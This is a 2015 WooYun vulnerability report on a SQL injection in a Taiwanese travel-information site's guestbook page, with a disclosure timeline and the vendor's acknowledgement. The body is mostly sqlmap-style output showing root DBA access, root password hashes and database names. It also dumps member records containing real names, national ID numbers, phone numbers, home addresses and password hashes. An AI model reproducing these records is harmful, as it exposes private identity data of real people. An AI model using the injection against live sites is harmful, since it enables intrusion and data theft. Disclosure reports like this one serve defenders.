漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0148345
漏洞标题:清境旅游咨讯网存在SQL注入(臺灣地區)
相关厂商:清境旅游咨讯网
漏洞作者: Blaze
提交时间:2015-10-21 15:08
修复时间:2015-12-06 22:28
公开时间:2015-12-06 22:28
漏洞类型:SQL注射漏洞
危害等级:低
自评Rank:5
漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-10-21: 细节已通知厂商并且等待厂商处理中
2015-10-22: 厂商已经确认,细节仅向厂商公开
2015-11-01: 细节向核心白帽子及相关领域专家公开
2015-11-11: 细节向普通白帽子公开
2015-11-21: 细节向实习白帽子公开
2015-12-06: 细节向公众公开
简要描述:
详细说明:
http://**.**.**.**/cja/guestcj/message.asp?id=2333 存在SQL注入
布尔注入 MySQL windows 2003 IIS 6
[11:19:24] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: MySQL 5.0
用户
database management system users [113]:
[*] ''@'localhost'
[*] 'root'@'%'
[*] 'root'@'**.**.**.**'
[*] 'root'@'::1'
[*] 'root'@'localhost'
当前用户 dba权限
current user: 'root@localhost'
current user is DBA: 'True'
密码hash
database management system users password hashes:
[*] root [4]:
password hash: *8F5193A299A2DAF5042290B9A10E1284C8600CE0
password hash: *8F5193A299A2DAF5042290B9A10E1284C8600CE0
password hash: *8F5193A299A2DAF5042290B9A10E1284C8600CE0
password hash: *8F5193A299A2DAF5042290B9A10E1284C8600CE0
库
available databases [17]:
[*] cja
[*] db
[*] dbcount
[*] dbforguestbooks
[*] dbforhotel
[*] dbformb
[*] dbformbbooks
[*] dbforpanel
[*] dbforweb
[*] dbforwork
[*] download
[*] imagebooks
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] user
| 無
| 1979-11-04 00:00:00 | 2011-04-08 13:19:22 | 1 | 2 | gary077.chu@**.**.**.** | 1| 1 | 0 | NULL | 2011-04-08 13:26:07 | 0 | 123456789 | 小明 | 小明| 314 | 17 | 303640f09610c5431499d2fcd814c229| f124761444 | 0 | 1 | 02-12234567 |
| None
| 1977-02-20 00:00:00 | 2011-06-25 10:28:28 | 1 | 6 | u4079238@**.**.**.** | 1| 1 | 0 | NULL | 2011-06-25 10:28:28 | 0 | None| 祖旭華
| Peter| 315 | 15 | bcfc803d83cf8ce4253e8ea7953bbf63| e122523678 | 0 | 1 | None|| 桃園縣平鎮市雅豐街55巷39弄3號
| 1973-01-08 00:00:00 | 2011-07-21 00:54:50 | 2 | 2| a8874824@**.**.**.** | 1 | 1 | 0 | NULL | 2011-07-21 00:54:50 | 0 | 0955446010 | 呂芳華 | 小華 | 316 | 20 | 45bf417955f7852c626efac2c0f27b0a| h120570350 | 0 | 1 | 03-4697327 |
| None
| 1979-03-30 00:00:00 | 2011-10-15 19:16:53 | None | None | ctfang@**.**.**.** | 1 | 1 | 0 | NULL | 2011-10-15 19:16:53 | 0 | None | 方政泰
| Joe | 317 | None | ff92a240d11b05ebd392348c35f781b2| f124555820 | 0 | 1 |None|新竹縣寶山鄉竹園路87巷2號
| 1952-08-02 00:00:00 | 2011-12-18 15:37:03 | 2 | 4 | lian4182@**.**.**.** | 1 | 0 | 1 | NULL | 2011-12-18 15:40:32 | 1 | 0910156688 | 朱麗媛
| lian | 318 | 18 | 82dab982fb01ce5a9e6abd13dd3a6643| r200009706 | 0 | 1 | None || None | 1989-01-18 00:00:00
| 2012-01-02 15:37:54 | None | None | miki780118@**.**.**.** | 1 | 0 | 0 | NULL | 2012-01-02 15:40:18 | 0 | 0988181211 | 林芊妤
| MIKI| 319 | None | 92c3ae0cffae609cddaea7de8e8b5623| p223114628 | 0 | 1 | None || None |
1978-08-12 00:00:00 | 2012-02-15 14:28:30 | None | None | suky.7812@**.**.**.** | 1| 0 | 1 | NULL | 2012-02-15 14:32:45 | 1 | None | chan wai sze
| suky | 320 | None | 601a17fa8a2c225a128be6feb6e9b6fd| suky7812 | 1 | 1 | None |
+-------------------------------------------------------------------------------
对应是
lAddress | varchar(255)
lBirthday | datetime
lCreatTime | datetime
lEarning | varchar(1)
lEducation | varchar(1)
lEmail | varchar(100)
lEnable | varchar(1)
lGender | varchar(1)
lHasChildren | varchar(1)
lHobby | varchar(2)
lLoginTime | datetime
lMarriage | varchar(1)
lMobile | varchar(25)
lName | varchar(100)
lNickname | varchar(10)
lNo | int(11)
lOccupation | varchar(2)
lPassword | varchar(32)
lSSN | varchar(10)
lssnRadio | varchar(1)
lSubscribe | varchar(1)
lTel | varchar(25)
漏洞证明:
修复方案:
版权声明:转载请注明来源 Blaze@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:18
确认时间:2015-10-22 22:26
厂商回复:
感謝通報
最新状态:
暂无